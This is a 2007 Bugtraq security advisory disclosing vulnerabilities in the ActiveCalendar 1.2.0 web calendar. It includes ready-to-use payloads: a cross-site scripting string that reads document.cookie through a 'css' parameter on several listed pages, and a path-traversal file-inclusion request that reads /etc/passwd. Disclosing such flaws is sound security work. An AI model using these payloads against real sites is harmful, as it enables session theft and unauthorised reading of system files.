Message-ID: <20070224023454.20638.qmail@securityfocus.com>
Date: 24 Feb 2007 02:34:54 -0000
From: simon.itsecurity@...il.com
To: bugtraq@...urityfocus.com
Subject: ActiveCalendar 1.2.0, Multiple vulnerabilities

ActiveCalendar 1.2.0, Multiple vulnerabilities
Vendor site : http://www.micronetwork.de/activecalendar/
Global risk : Critical

Multiple XSS :
--------------

/activecalendar/data/[page].php?css="><script>alert(document.cookie)</script>

In :

/data/
flatevents.php
js.php
mysqlevents.php
m_2.php
m_3.php
m_4.php
xmlevents.php
y_2.php
y_3.php


Local File Include :
---------------------

/activecalendar/data/showcode.php?page=../../../../../../../../../../../../../../etc/passwd%00


Regards,


Simon Bonnard - 24/02/07 - 02:40am
                                       
